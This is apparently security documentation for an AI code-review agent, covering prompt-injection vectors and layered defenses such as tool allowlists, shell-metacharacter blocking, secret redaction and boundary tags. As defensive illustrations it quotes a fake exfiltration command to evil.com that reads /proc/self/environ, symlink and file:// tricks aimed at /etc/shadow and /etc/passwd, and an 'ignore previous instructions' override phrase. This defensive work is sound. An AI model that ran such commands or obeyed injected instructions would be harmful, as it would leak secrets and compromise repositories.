Security¶
This page covers the security model, threat surface, and hardening recommendations for Nominal Code — with particular focus on LLM-related risks.
Trust Model¶
| Category | Input | Trust Level |
|---|---|---|
| Configuration | Environment variables, system prompts, webhook secrets, ALLOWED_USERS |
Trusted — set by the operator |
| User content | PR diffs, PR comments, repository file content, webhook payloads | Untrusted — controlled by external contributors |
| Per-repo overrides | .nominal/guidelines.md, .nominal/languages/{lang}.md |
Semi-trusted — committed by repo maintainers, injected into the system prompt |
Primary attack surface
PR diffs and repository content are the primary attack surface. Any contributor who can open a PR or push code can influence what the LLM sees and how it reasons.
LLM Security¶
Prompt Injection Risks¶
Prompt injection occurs when untrusted input manipulates the LLM into ignoring its instructions or performing unintended actions. In the context of AI code review, the main attack vectors are:
-
Via PR diff — malicious instructions embedded in code comments, docstrings, or string literals that the reviewer agent reads during analysis.
-
Via PR comments — adversarial text in the existing discussion context. When the agent processes conversation history, injected instructions in earlier comments can influence its behavior.
-
Via repository content — files read by the agent during review (e.g. configuration files, documentation, or other source files) may contain adversarial content designed to steer the agent.
-
Via
.nominal/guidelines.md— per-repo guideline overrides are injected directly into the system prompt. A compromised or malicious guideline file can alter the agent's review behavior.
Built-in Mitigations¶
The following mechanisms limit the impact of a successful prompt injection:
-
Read-only tool restrictions — the reviewer bot can only use
Read,Glob,Grep, andBash(git clone*). Even if prompt-injected, it cannot modify files, push code, or call arbitrary commands. -
Bash command allowlisting — bash commands are checked against
fnmatchpatterns before execution. Commands that don't match an allowed pattern are rejected with an error. -
Shell injection blocking — when bash patterns are active, commands are validated against a blocklist of shell metacharacters (
$,`,|,;,&) and dangerous builtins (eval,exec,source). This prevents attacks likegit clone https://evil.com/$(cat /proc/self/environ)that would pass the fnmatch allowlist but exfiltrate secrets via shell expansion. -
Git clone host validation —
git clonecommands are restricted to known hostnames (default:github.com,gitlab.com). Clones targeting unknown hosts are rejected, preventing data exfiltration to attacker-controlled servers. The allowlist is configurable viaallowed_clone_hostsfor self-hosted instances. -
Git clone hardening — all
git cloneandgit fetchoperations are hardened with three config overrides that prevent malicious repositories from executing code during checkout:core.hooksPath=/dev/null— disables all git hooks (post-checkout,post-merge,pre-commit, etc.), preventing a repo from executing arbitrary shell scripts via hook files.core.symlinks=false— git creates regular files instead of symlinks, preventing a repo from planting a symlink likeconfig.py -> /etc/shadowthat escapes the workspace directory.protocol.file.allow=never— blocks thefile://protocol in submodules, preventing.gitmodulesentries likeurl = file:///etc/passwdfrom reading arbitrary local files during submodule initialization.
-
Environment sanitization — subprocess tools (
Bash,Grep) run with a sanitized environment containing only safe variables (PATH,HOME,LANG, etc.). Secrets likeGITLAB_TOKEN,REDIS_URL, and API keys are stripped from the subprocess environment using an allowlist approach. This is the primary defense against secret exfiltration via tool execution. -
Output sanitization — all tool outputs are scanned for known secret patterns (GitLab PATs, GitHub PATs, OpenAI keys, Google API keys, private keys, bearer tokens) and redacted with
[REDACTED]before being returned to the LLM. Review output (summaries and inline comments) is also sanitized before being posted to the platform, preventing the LLM from embedding leaked secrets in PR comments. -
Prompt boundary tags — untrusted content (diffs, comments, user prompts, file paths, branch names) is wrapped in XML boundary tags (
<untrusted-diff>,<untrusted-comment>, etc.) before insertion into LLM prompts. The system prompt includes anchoring instructions that tell the LLM to treat tagged content as opaque data, not as instructions to follow. -
ALLOWED_USERSgating — only users listed inALLOWED_USERScan trigger the agent via comments. Unauthorized users are silently ignored, preventing external actors from directly prompting the agent. -
Turn and token caps —
AGENT_MAX_TURNSlimits the number of agent loop iterations, andMAX_RESPONSE_TOKENS(16,384) caps each LLM response. These prevent runaway agent loops. -
Diff line validation — review findings are validated against the actual diff. Findings that reference lines outside the diff are filtered out and appended to the summary instead.
Prompt Boundary Tags¶
All untrusted content inserted into LLM prompts is wrapped in XML boundary tags that mark data boundaries. The system prompt includes anchoring instructions telling the LLM to treat tagged content as data only, not as instructions.
| Tag | Content | Source |
|---|---|---|
<untrusted-diff> |
PR patch | _build_reviewer_prompt |
<untrusted-comment> |
Existing comment bodies | _format_existing_comments |
<untrusted-request> |
User mention prompt | Both prompt builders |
<untrusted-hunk> |
Diff hunk context | _build_prompt (worker) |
<file-path> |
File paths | Both prompt builders |
<branch-name> |
PR branch name | Both prompt builders |
<repo-guidelines> |
Repo guidelines | resolve_system_prompt |
Attacks mitigated¶
- Direct instruction injection — malicious text in diffs or comments that says "ignore previous instructions" is clearly inside a data boundary, making the LLM far less likely to follow it.
- Role impersonation — content pretending to be system prompt text (e.g. "## New Instructions") is enclosed in a tag the system prompt explicitly marks as untrusted data.
- Context escape — without boundaries, carefully placed markdown (e.g. closing a code fence then adding instructions) can blend into the surrounding prompt. XML tags create a stronger delimiter that is harder to escape from.
Limitations¶
Boundary tags are a defense-in-depth measure, not a guarantee. A
determined attacker can still embed closing tags (e.g.
</untrusted-diff>) inside content. The anchoring instructions
in the system prompt are the secondary defense for this case.
Combined with tool restrictions, environment sanitization, and
output redaction, boundary tags significantly raise the bar for
successful prompt injection.
Recommendations¶
-
Prefer reviewer-only mode — the reviewer bot's read-only tool set drastically limits the blast radius of prompt injection. Use the worker bot at your own risk.
-
Keep
ALLOWED_USERStight — only grant access to trusted team members. In open-source repos, this prevents external contributors from prompting the agent directly. -
Use read-only reviewer tokens — set
GITHUB_REVIEWER_TOKEN(orGITLAB_REVIEWER_TOKEN) to a token with only read and comment permissions. This adds a second layer of defense beyond tool restrictions. -
Set
AGENT_MAX_TURNS— configure a reasonable cap (e.g. 10–20) to limit how many iterations the agent can run, reducing the window for exploitation. -
Review
.nominal/guidelines.mdchanges carefully — these files are injected into the system prompt. Treat changes to them with the same scrutiny as CI configuration changes. -
For open-source repos, prefer CI mode — CI mode runs automatically on PR events without accepting user-supplied prompts, eliminating comment-based injection vectors entirely.
Worker bot considerations
The worker bot runs with full tool access (bypassPermissions) and can modify files, run arbitrary commands, and push commits. A successful prompt injection against the worker bot could result in arbitrary code execution and unauthorized repository changes. Only enable it in trusted, private repositories with a restricted set of allowed users.
Webhook Verification¶
GitHub¶
Webhook payloads are verified using HMAC-SHA256. The X-Hub-Signature-256 header is compared against the expected signature using hmac.compare_digest() for constant-time comparison:
expected = "sha256=" + hmac.new(
webhook_secret.encode(), body, hashlib.sha256,
).hexdigest()
return hmac.compare_digest(signature, expected)
GitLab¶
GitLab webhooks are verified by comparing the X-Gitlab-Token header against the configured shared secret, also using hmac.compare_digest().
Verification skipped when no secret is configured
If GITHUB_WEBHOOK_SECRET or GITLAB_WEBHOOK_SECRET is not set, signature verification is skipped entirely and all payloads are accepted. Always configure a webhook secret in production.
Request Size Limit¶
The webhook server enforces a 5 MB maximum request body size. Payloads exceeding this limit are rejected before processing.
Authentication¶
GitHub PAT Mode¶
Set GITHUB_TOKEN to a personal access token. Optionally set GITHUB_REVIEWER_TOKEN for the reviewer bot to use a separate, more restricted token.
GitHub App Mode (Recommended)¶
GitHub App authentication uses RS256 JWTs to request short-lived installation tokens:
- JWTs expire after 600 seconds
- Installation tokens are cached for 1 hour and refreshed with a 5-minute margin
- Tokens are automatically rotated — no long-lived secrets beyond the private key
- Scoped to the specific permissions granted to the App
Configure via GITHUB_APP_ID, GITHUB_APP_PRIVATE_KEY (inline) or GITHUB_APP_PRIVATE_KEY_PATH (file path), and optionally GITHUB_INSTALLATION_ID.
GitLab¶
Set GITLAB_TOKEN for full access. Optionally set GITLAB_REVIEWER_TOKEN for reviewer-specific operations.
Authorization¶
Comment Events¶
When a user mentions the bot in a PR comment, the author's username is checked against the ALLOWED_USERS frozenset. Comments from unauthorized users are silently ignored:
if event.author_username not in config.allowed_users:
logger.warning("Ignoring comment from unauthorized user: %s", event.author_username)
return
ALLOWED_USERS must contain at least one username — the server refuses to start without it.
Auto-trigger Events¶
PR lifecycle events (open, push, reopen, ready-for-review) configured in REVIEWER_TRIGGERS bypass the ALLOWED_USERS check. These events have no user-supplied prompt, and draft/WIP PRs are skipped.
Tool Restrictions¶
| Capability | Reviewer Bot | Worker Bot |
|---|---|---|
| Available tools | Read, Glob, Grep, Bash(git clone*) |
All tools |
| Bash commands | Only git clone* (fnmatch) + shell injection check |
Unrestricted |
| Git clone hosts | github.com, gitlab.com (configurable) |
Configurable |
| Subprocess environment | Sanitized (allowlisted vars only) | Sanitized (allowlisted vars only) |
| Output sanitization | Secret patterns redacted | Secret patterns redacted |
| Permission mode | bypassPermissions (with tool allowlist) |
bypassPermissions (no allowlist) |
| Can modify files | No | Yes |
| Can push code | No | Yes |
Defense-in-Depth Architecture¶
Secret leakage prevention is implemented across four layers. Each layer is independent — even if one layer is bypassed, the others continue to protect against exfiltration.
Layer 1: Environment Sanitization¶
The build_sanitized_env() function in nominal_code/agent/sandbox.py filters os.environ using an allowlist of safe variable names:
All subprocess tools (Bash, Grep) receive this filtered environment via the env= parameter on asyncio.create_subprocess_exec. Secrets like GITLAB_TOKEN, REDIS_URL, ANTHROPIC_API_KEY, and ENCRYPTION_KEY are never present in the subprocess.
The allowlist can be extended via extra_safe_vars for specific use cases.
Layer 2: Shell Injection Blocking¶
When bash patterns are active (i.e., the reviewer bot), commands are validated before execution:
-
Metacharacter check — a regex blocks
$,`,|,;,&, and builtinseval/exec/source. This prevents shell expansion attacks that could read environment variables or chain commands. -
Clone host validation — for
git clonecommands, the target URL hostname is parsed and checked against an allowlist. Both HTTPS and SSH-style (git@host:path) URLs are supported.
Layer 3: Output Sanitization¶
The sanitize_output() function scans text for known secret patterns and replaces matches with [REDACTED]:
| Pattern | Example |
|---|---|
| GitLab PAT | glpat-... |
| GitHub PAT / App token | ghp_..., ghs_... |
| OpenAI key | sk-... |
| Google API key | AIza... |
| Private keys | -----BEGIN RSA PRIVATE KEY----- |
| Bearer tokens | Bearer eyJ... |
Output sanitization is applied at two points:
- Tool results — before returning to the LLM (prevents the model from reasoning about secrets)
- Review posting — summary and all inline comment bodies are sanitized before being submitted to GitHub/GitLab (prevents secrets appearing in PR comments)
Secret Management¶
-
All secrets are passed via environment variables —
GITHUB_TOKEN,GITHUB_WEBHOOK_SECRET,GITHUB_APP_PRIVATE_KEY,GITLAB_TOKEN, etc. -
Token redaction in logs — embedded tokens in clone URLs are redacted using
_redact_url(), which replaces credentials with***before logging: -
Private key options — GitHub App private keys can be provided inline (
GITHUB_APP_PRIVATE_KEY) or via file path (GITHUB_APP_PRIVATE_KEY_PATH). Inline takes precedence. -
Never commit
.envfiles — secrets should be injected via your deployment platform's secret management (e.g. Docker secrets, Kubernetes secrets, CI variables).
Resource Limits¶
| Resource | Limit | Purpose |
|---|---|---|
| Bash command timeout | 120 seconds | Prevents long-running commands |
| Grep timeout | 30 seconds | Prevents expensive searches |
| HTTP client timeout | 30 seconds | Prevents hanging API calls |
| Max response tokens | 16,384 | Caps LLM output per response |
| Max agent turns | Configurable (AGENT_MAX_TURNS, default: unlimited) |
Limits agent loop iterations |
| Max glob results | 200 | Prevents oversized file listings |
| Max grep output | 30,000 characters | Truncates large search results |
| Max read lines | 2,000 | Truncates large file reads |
| Max line length | 2,000 characters | Truncates long lines |
| Webhook body size | 5 MB | Rejects oversized payloads |
| Shallow clone depth | 1 commit | Minimizes cloned data |
| Tool log truncation | 500 characters | Limits tool output in logs |
Kubernetes Pod Hardening¶
When running review jobs on Kubernetes, the job runner applies security hardening to all pod specs unconditionally.
Container Security Context¶
Every review container runs with a restricted security context:
| Setting | Default | Purpose |
|---|---|---|
readOnlyRootFilesystem |
true |
Prevents writing to the container filesystem |
runAsNonRoot |
true |
Blocks running as root |
runAsUser |
1000 |
Fixed UID matching the Dockerfile nominal user |
allowPrivilegeEscalation |
false |
Prevents gaining additional privileges |
capabilities.drop |
["ALL"] |
Drops all Linux capabilities |
Writable Volumes¶
Since the root filesystem is read-only, three emptyDir volumes are mounted:
/workspace— repository checkout and agent working directory/tmp— temporary files/home/nominal— user home directory (uv cache, git config)
Non-root Docker Images¶
The Dockerfile creates a dedicated nominal user (UID 1000, GID 1000) and chowns the application and workspace directories to it. The image does not set USER nominal because GitHub Actions container jobs require root access to host-mounted volumes. Instead, non-root execution is enforced at the Kubernetes layer via runAsUser: 1000 and runAsNonRoot: true in the pod security context.
Service Account Token¶
automountServiceAccountToken is set to false by default, preventing job pods from accessing the Kubernetes API. This blocks metadata-based attacks (e.g., reading secrets from the API server).
Network Policy (Deployment Concern)¶
For additional isolation, deploy a Kubernetes NetworkPolicy that:
- Blocks the cloud metadata endpoint (
169.254.169.254) - Restricts egress to: LLM API provider, git hosting (
gitlab.com/github.com), Redis - Denies all ingress to job pods
This is a deployment-level configuration, not managed by the application.
Network Exposure¶
-
Default bind address — the server binds to
0.0.0.0:8080. Restrict network access using firewall rules or deploy behind a reverse proxy. -
TLS termination — the server does not terminate TLS. Use a reverse proxy (e.g. nginx, Caddy, cloud load balancer) for HTTPS.
-
Health endpoint —
GET /healthreturns{"status": "ok"}with no sensitive data. -
Webhook routes —
POST /webhooks/githubandPOST /webhooks/gitlabreturn401for requests with invalid signatures when a webhook secret is configured. -
Per-PR serialization — concurrent requests for the same PR are queued and processed one at a time, keyed by
(platform, repo, pr_number, bot_type). This prevents race conditions but does not limit concurrency across different PRs.